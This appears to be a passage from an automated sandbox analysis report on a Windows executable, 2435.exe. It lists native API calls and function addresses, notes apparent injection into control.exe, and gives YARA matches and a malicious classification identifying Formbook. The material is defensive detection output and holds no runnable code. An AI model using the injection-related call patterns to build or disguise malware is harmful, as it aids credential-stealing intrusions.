          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AB98F0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AB9860
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,1_2_00AB9840
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,1_2_00AB99A0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AB9910
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,1_2_00AB9A20
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AB9A00
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,1_2_00AB9A50
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,1_2_00AB95D0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,1_2_00AB9540
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AB96E0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AB9660
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AB97A0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AB9780
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AB9710
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB98A0 NtWriteVirtualMemory,1_2_00AB98A0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9820 NtEnumerateKey,1_2_00AB9820
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABB040 NtSuspendThread,1_2_00ABB040
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB99D0 NtCreateProcessEx,1_2_00AB99D0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9950 NtQueueApcThread,1_2_00AB9950
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A80 NtOpenDirectoryObject,1_2_00AB9A80
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9A10 NtQuerySection,1_2_00AB9A10
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABA3B0 NtGetContextThread,1_2_00ABA3B0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9B00 NtSetValueKey,1_2_00AB9B00
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB95F0 NtQueryInformationFile,1_2_00AB95F0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9520 NtWaitForSingleObject,1_2_00AB9520
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABAD30 NtSetContextThread,1_2_00ABAD30
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9560 NtWriteFile,1_2_00AB9560
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB96D0 NtCreateKey,1_2_00AB96D0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9610 NtEnumerateValueKey,1_2_00AB9610
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9670 NtQueryInformationProcess,1_2_00AB9670
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9650 NtQueryValueKey,1_2_00AB9650
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9FE0 NtCreateMutant,1_2_00AB9FE0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9730 NtQueryVirtualMemory,1_2_00AB9730
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABA710 NtOpenProcessToken,1_2_00ABA710
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9760 NtOpenProcess,1_2_00AB9760
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9770 NtSetInformationFile,1_2_00AB9770
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ABA770 NtOpenThread,1_2_00ABA770
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419D60 NtCreateFile,1_1_00419D60
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E10 NtReadFile,1_1_00419E10
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E90 NtClose,1_1_00419E90
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,1_1_00419F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779540 NtReadFile,LdrInitializeThunk,9_2_04779540
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795D0 NtClose,LdrInitializeThunk,9_2_047795D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04779660
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779650 NtQueryValueKey,LdrInitializeThunk,9_2_04779650
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_047796E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796D0 NtCreateKey,LdrInitializeThunk,9_2_047796D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779710 NtQueryInformationToken,LdrInitializeThunk,9_2_04779710
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779FE0 NtCreateMutant,LdrInitializeThunk,9_2_04779FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779780 NtMapViewOfSection,LdrInitializeThunk,9_2_04779780
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,9_2_04779860
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779840 NtDelayExecution,LdrInitializeThunk,9_2_04779840
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_04779910
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799A0 NtCreateSection,LdrInitializeThunk,9_2_047799A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A50 NtCreateFile,LdrInitializeThunk,9_2_04779A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779560 NtWriteFile,9_2_04779560
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477AD30 NtSetContextThread,9_2_0477AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779520 NtWaitForSingleObject,9_2_04779520
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795F0 NtQueryInformationFile,9_2_047795F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779670 NtQueryInformationProcess,9_2_04779670
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779610 NtEnumerateValueKey,9_2_04779610
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A770 NtOpenThread,9_2_0477A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779770 NtSetInformationFile,9_2_04779770
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779760 NtOpenProcess,9_2_04779760
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779730 NtQueryVirtualMemory,9_2_04779730
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A710 NtOpenProcessToken,9_2_0477A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047797A0 NtUnmapViewOfSection,9_2_047797A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477B040 NtSuspendThread,9_2_0477B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779820 NtEnumerateKey,9_2_04779820
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798F0 NtReadVirtualMemory,9_2_047798F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798A0 NtWriteVirtualMemory,9_2_047798A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779950 NtQueueApcThread,9_2_04779950
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799D0 NtCreateProcessEx,9_2_047799D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A20 NtResumeThread,9_2_04779A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A10 NtQuerySection,9_2_04779A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A00 NtProtectVirtualMemory,9_2_04779A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A80 NtOpenDirectoryObject,9_2_04779A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779B00 NtSetValueKey,9_2_04779B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A3B0 NtGetContextThread,9_2_0477A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E90 NtClose,9_2_02FC9E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E10 NtReadFile,9_2_02FC9E10
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F40 NtAllocateVirtualMemory,9_2_02FC9F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D60 NtCreateFile,9_2_02FC9D60
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E8A NtClose,9_2_02FC9E8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E0A NtReadFile,9_2_02FC9E0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F3A NtAllocateVirtualMemory,9_2_02FC9F3A
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D5A NtCreateFile,9_2_02FC9D5A
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_004048530_2_00404853
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_004061310_2_00406131
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_73351A980_2_73351A98
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041E1FC1_2_0041E1FC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041D2601_2_0041D260
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041DA2A1_2_0041DA2A
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041BDC41_2_0041BDC4
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041D6DF1_2_0041D6DF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041DFA31_2_0041DFA3
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A01_2_00AA20A0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B420A81_2_00B420A8
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B0901_2_00A8B090
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B428EC1_2_00B428EC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4E8241_2_00B4E824
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A8301_2_00A9A830
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B310021_2_00B31002
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF1_2_00A999BF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A941201_2_00A94120
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7F9001_2_00A7F900
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B422AE1_2_00B422AE
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF1_2_00B34AEF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FA2B1_2_00B2FA2B
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAEBB01_2_00AAEBB0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B223E31_2_00B223E3
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3DBD21_2_00B3DBD2
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B303DA1_2_00B303DA
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAABD81_2_00AAABD8
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42B281_2_00B42B28
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A3091_2_00A9A309
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AB401_2_00A9AB40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B344961_2_00B34496
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8841F1_2_00A8841F
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3D4661_2_00B3D466
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA25811_2_00AA2581
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D821_2_00B32D82
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E01_2_00A8D5E0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B425DD1_2_00B425DD
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A70D201_2_00A70D20
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42D071_2_00B42D07
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41D551_2_00B41D55
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42EF71_2_00B42EF7
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A96E301_2_00A96E30
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3D6161_2_00B3D616
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41FF11_2_00B41FF1
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4DFCE1_2_00B4DFCE
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041E1FC1_1_0041E1FC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041D2601_1_0041D260
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041DA2A1_1_0041DA2A
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FD4669_2_047FD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474841F9_2_0474841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04730D209_2_04730D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048025DD9_2_048025DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802D079_2_04802D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E09_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04801D559_2_04801D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047625819_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04756E309_2_04756E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FD6169_2_047FD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802EF79_2_04802EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480DFCE9_2_0480DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04801FF19_2_04801FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048020A89_2_048020A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475A8309_2_0475A830
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048028EC9_2_048028EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F10029_2_047F1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480E8249_2_0480E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047620A09_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474B0909_2_0474B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047541209_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473F9009_2_0473F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047599BF9_2_047599BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048022AE9_2_048022AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047EFA2B9_2_047EFA2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AB409_2_0475AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475A3099_2_0475A309
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E23E39_2_047E23E3
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F03DA9_2_047F03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802B289_2_04802B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FDBD29_2_047FDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476ABD89_2_0476ABD8
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476EBB09_2_0476EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCE1FC9_2_02FCE1FC
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB9E409_2_02FB9E40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB9E3C9_2_02FB9E3C
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB2FB09_2_02FB2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCDFA39_2_02FCDFA3
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCBDC49_2_02FCBDC4
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB2D909_2_02FB2D90
          Source: C:\Users\user\Desktop\2435.exeCode function: String function: 00A7B150 appears 133 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0473B150 appears 90 times
          Source: 2435.exe, 00000000.00000003.228583086.0000000009C7F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288731755.0000000000CFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288265327.00000000007E1000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 2435.exe
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/4
